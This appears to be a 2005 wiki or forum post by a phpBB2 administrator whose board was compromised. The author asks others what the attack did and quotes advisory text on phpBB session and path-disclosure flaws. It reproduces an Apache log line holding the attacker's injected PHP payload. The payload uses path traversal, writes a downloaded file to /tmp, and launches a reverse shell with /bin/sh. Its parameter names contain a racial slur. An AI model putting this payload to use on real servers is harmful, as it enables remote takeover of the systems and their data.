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PHPBB2 code injection exploit
I know that a few people who run PmWiki also run PHPBB2 bulletin boards.
One of mine was hacked with an SQL code injection attack. I am not sure what the results of this hack are, but in one report, the author claims it can be used to add an SQL user with administrative rights:
If anyone has further info on this exploit, I would like to hear it via private mail or by adding your comments to this page.
Unfortunately, in the rush to mitigate the damage I ended up having my server IP switched, so DNSes may be behind. (It's a long story you don't want to hear, believe me!)
Apparently it is only version 2.0.11 or lower that is vulnerable, but when I went to PHPBB2 to get an update, I found their site database was throwing errors!!
Looks like the code is posted here:
This is the Apache log entry where the injection occured on my system:
start=== - - [16/Mar/2005:14:03:08 -0500] "GET /phpbb2/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=589e2909e59ae314598ec36f73fc141d&$a=fopen(\"\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1" 200 114 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Can anyone tell me what this does???
More info here:
...where they say: Two vulnerabilities were reported in phpBB, which may be exploited by attackers to determine the installation path or bypass certain security features. The first problem resides in the "autologinid" (includes/sessions.php) variable and could be exploited by malicious users to gain administrator rights. The second flaw resides in the "viewtopic.php" script, and could be exploited to disclose the webroot path.